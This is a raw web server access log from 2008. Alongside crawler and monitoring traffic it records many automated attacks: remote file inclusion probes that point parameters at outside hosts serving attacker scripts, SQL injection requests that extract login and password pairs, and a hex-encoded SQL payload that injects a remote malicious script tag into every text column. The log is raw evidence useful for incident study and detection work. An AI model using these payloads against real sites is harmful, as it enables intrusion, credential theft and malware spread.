209.59.12.99 - - [06/Sep/2008:00:01:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [06/Sep/2008:00:06:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.58.221 - - [06/Sep/2008:00:06:45 -0400] "GET /logs/error_log.Q108032300//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://bbwonlinepersonals.com/groups/gallery/did.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
74.6.17.183 - - [06/Sep/2008:00:07:20 -0400] "GET /logs/access_log.Q107080500 HTTP/1.0" 200 674163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Sep/2008:00:11:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.114 - - [06/Sep/2008:00:11:39 -0400] "GET /logs/error_log.Q107072200 HTTP/1.1" 200 18115 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.17.183 - - [06/Sep/2008:00:12:07 -0400] "GET /images/ACE_Orderform.pdf HTTP/1.0" 200 31826 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.116.1.202 - - [06/Sep/2008:00:14:27 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.116.1.202 - - [06/Sep/2008:00:14:27 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.116.1.202 - - [06/Sep/2008:00:15:01 -0400] "GET /logs/access_log.Q108082600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
204.15.10.144 - - [06/Sep/2008:00:15:15 -0400] "GET /logs/error_log.Q108082100//questions.php?idcat=10+UNION+SELECT+1,concat(login,0x3a,0x3a,0x3a,password),3,4,5,6,7,8,9 HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
204.15.10.144 - - [06/Sep/2008:00:15:17 -0400] "GET //questions.php?idcat=10+UNION+SELECT+1,concat(login,0x3a,0x3a,0x3a,password),3,4,5,6,7,8,9 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
204.15.10.144 - - [06/Sep/2008:00:15:17 -0400] "GET /logs//questions.php?idcat=10+UNION+SELECT+1,concat(login,0x3a,0x3a,0x3a,password),3,4,5,6,7,8,9 HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Sep/2008:00:16:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.227.22.192 - - [06/Sep/2008:00:18:22 -0400] "GET /logs/access_log.Q108082600/phphtml.php?htmlclass_path=http://locoputo.supergranny.ws/id2.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
66.199.244.42 - - [06/Sep/2008:00:19:55 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
121.143.156.127 - - [06/Sep/2008:00:20:34 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
121.143.156.127 - - [06/Sep/2008:00:20:34 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
121.143.156.127 - - [06/Sep/2008:00:20:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
121.143.156.127 - - [06/Sep/2008:00:20:42 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
121.143.156.127 - - [06/Sep/2008:00:20:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
121.143.156.127 - - [06/Sep/2008:00:20:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
121.143.156.127 - - [06/Sep/2008:00:20:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
69.73.188.36 - - [06/Sep/2008:00:20:53 -0400] "GET /logs/error_log.Q108071700//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 258 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:00:20:53 -0400] "GET //cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:00:20:53 -0400] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
193.189.74.23 - - [06/Sep/2008:00:21:13 -0400] "GET /logs/error_log.Q108071700//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 258 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:00:21:13 -0400] "GET //cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:00:21:13 -0400] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
74.6.17.183 - - [06/Sep/2008:00:21:20 -0400] "GET /logs/error_log.Q108033000 HTTP/1.0" 200 90557 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Sep/2008:00:21:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.73.188.36 - - [06/Sep/2008:00:21:31 -0400] "GET /logs/error_log.Q108070500//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 258 "-" "libwww-perl/5.810"
193.189.74.23 - - [06/Sep/2008:00:21:54 -0400] "GET /logs/error_log.Q108070500//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 258 "-" "libwww-perl/5.811"
121.143.156.127 - - [06/Sep/2008:00:22:41 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
121.143.156.127 - - [06/Sep/2008:00:22:41 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
121.143.156.127 - - [06/Sep/2008:00:22:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
121.143.156.127 - - [06/Sep/2008:00:22:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; InfoPath.1)"
213.150.60.20 - - [06/Sep/2008:00:25:40 -0400] "GET /logs/error_log.Q108071700//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 258 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:00:25:40 -0400] "GET /logs/error_log.Q108071700//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 258 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:00:25:40 -0400] "GET //cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 232 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:00:25:40 -0400] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 237 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:00:25:42 -0400] "GET //cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 232 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:00:25:42 -0400] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 237 "-" "libwww-perl/5.53"
209.59.12.99 - - [06/Sep/2008:00:26:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.199.244.42 - - [06/Sep/2008:00:26:34 -0400] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 229 "-" "libwww-perl/5.811"
213.150.60.20 - - [06/Sep/2008:00:27:48 -0400] "GET /logs/error_log.Q108070500//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 258 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:00:27:50 -0400] "GET /logs/error_log.Q108070500//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 258 "-" "libwww-perl/5.53"
208.116.1.202 - - [06/Sep/2008:00:28:36 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.116.1.202 - - [06/Sep/2008:00:28:36 -0400] "GET /logs/access_log.Q108082700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.116.1.202 - - [06/Sep/2008:00:28:36 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.116.1.202 - - [06/Sep/2008:00:28:38 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.116.1.202 - - [06/Sep/2008:00:29:19 -0400] "GET /logs/error_log.Q108072800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
209.59.12.99 - - [06/Sep/2008:00:31:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.162.3.161 - - [06/Sep/2008:00:31:58 -0400] "GET /logs/access_log.Q107082800?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 3600791 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.169.162.47 - - [06/Sep/2008:00:32:59 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
81.169.162.47 - - [06/Sep/2008:00:33:01 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
203.162.3.161 - - [06/Sep/2008:00:31:58 -0400] "GET /logs/access_log.Q107082800?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 3600791 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [06/Sep/2008:00:36:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.246.42.3 - - [06/Sep/2008:00:36:49 -0400] "GET /logs/error_log.Q108082100//include/admin.lib.inc.php?site_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:00:36:49 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:00:36:49 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.64"
66.199.244.42 - - [06/Sep/2008:00:38:17 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
74.6.17.183 - - [06/Sep/2008:00:37:50 -0400] "GET /logs/access_log.Q107110900 HTTP/1.0" 200 1940109 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.246.42.3 - - [06/Sep/2008:00:39:02 -0400] "GET /logs/access_log.Q108082600//include/admin.lib.inc.php?site_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:00:39:28 -0400] "GET /logs/access_log.Q108082700/errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:00:39:28 -0400] "GET /errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:00:39:28 -0400] "GET /logs/errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:00:39:55 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.64"
74.6.17.183 - - [06/Sep/2008:00:40:17 -0400] "GET /logs/error_log.Q107101100 HTTP/1.0" 200 110474 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.6.251.5 - - [06/Sep/2008:00:40:24 -0400] "GET /logs/access_log.Q108082700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
201.6.251.5 - - [06/Sep/2008:00:40:25 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
201.6.251.5 - - [06/Sep/2008:00:40:25 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
209.59.12.99 - - [06/Sep/2008:00:41:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.6.251.5 - - [06/Sep/2008:00:41:35 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
64.22.89.194 - - [06/Sep/2008:00:43:04 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://spr374.no-ip.org/na//includes/new.txt%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
64.22.89.194 - - [06/Sep/2008:00:43:04 -0400] "GET /logs/error_log.Q108082300//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://spr374.no-ip.org/na//includes/new.txt%0D?? HTTP/1.1" 404 272 "-" "libwww-perl/5.812"
64.22.89.194 - - [06/Sep/2008:00:43:04 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://spr374.no-ip.org/na//includes/new.txt%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.812"
64.22.89.194 - - [06/Sep/2008:00:43:04 -0400] "GET /logs/access_log.Q108061500//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://spr374.no-ip.org/na//includes/new.txt%0D?? HTTP/1.1" 404 273 "-" "libwww-perl/5.812"
64.22.89.194 - - [06/Sep/2008:00:43:38 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/wawe/test.txt? HTTP/1.1" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
64.22.89.194 - - [06/Sep/2008:00:43:38 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/wawe/test.txt? HTTP/1.1" 404 251 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
74.6.17.183 - - [06/Sep/2008:00:45:48 -0400] "GET /scripts/browser_opera7.js HTTP/1.0" 200 8675 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Sep/2008:00:46:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.22.89.194 - - [06/Sep/2008:00:46:38 -0400] "GET /logs/error_log.Q108082300%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://spr374.no-ip.org/na//includes/new.txt%0D?? HTTP/1.1" 404 273 "-" "libwww-perl/5.812"
141.89.66.2 - - [06/Sep/2008:00:47:46 -0400] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:47:46 -0400] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:47:46 -0400] "GET /logs/error_log.Q108032600/modules/TotalCalendar/about.php?inc_dir=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:47:57 -0400] "GET /logs/error_log.Q108082000/modules/TotalCalendar/about.php?inc_dir=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:49:17 -0400] "GET /logs/access_log.Q108081700/modules/TotalCalendar/about.php?inc_dir=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:49:20 -0400] "GET /logs/access_log.Q108080900/modules/TotalCalendar/about.php?inc_dir=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
201.6.251.5 - - [06/Sep/2008:00:49:35 -0400] "GET /errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.6.251.5 - - [06/Sep/2008:00:50:05 -0400] "GET /logs/errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
62.87.154.41 - - [06/Sep/2008:00:50:58 -0400] "GET /logs/error_log.Q108022500//claroline/tracking/userLog.php?rootSys=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.87.154.41 - - [06/Sep/2008:00:50:58 -0400] "GET /logs//claroline/tracking/userLog.php?rootSys=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.87.154.41 - - [06/Sep/2008:00:50:58 -0400] "GET //claroline/tracking/userLog.php?rootSys=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.87.154.41 - - [06/Sep/2008:00:51:08 -0400] "GET /logs/error_log.Q108060600//claroline/tracking/userLog.php?rootSys=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
74.6.17.183 - - [06/Sep/2008:00:51:01 -0400] "GET /logs/access_log.Q108051800 HTTP/1.0" 200 1518414 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Sep/2008:00:51:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.73.188.36 - - [06/Sep/2008:00:52:19 -0400] "GET /logs/access_log.Q108082400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:00:52:19 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:00:52:19 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:00:52:20 -0400] "GET /logs/access_log.Q108082400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:00:52:20 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:00:52:20 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
65.9.172.212 - - [06/Sep/2008:00:46:40 -0400] "GET /logs/access_log.Q108060700?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 491534 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
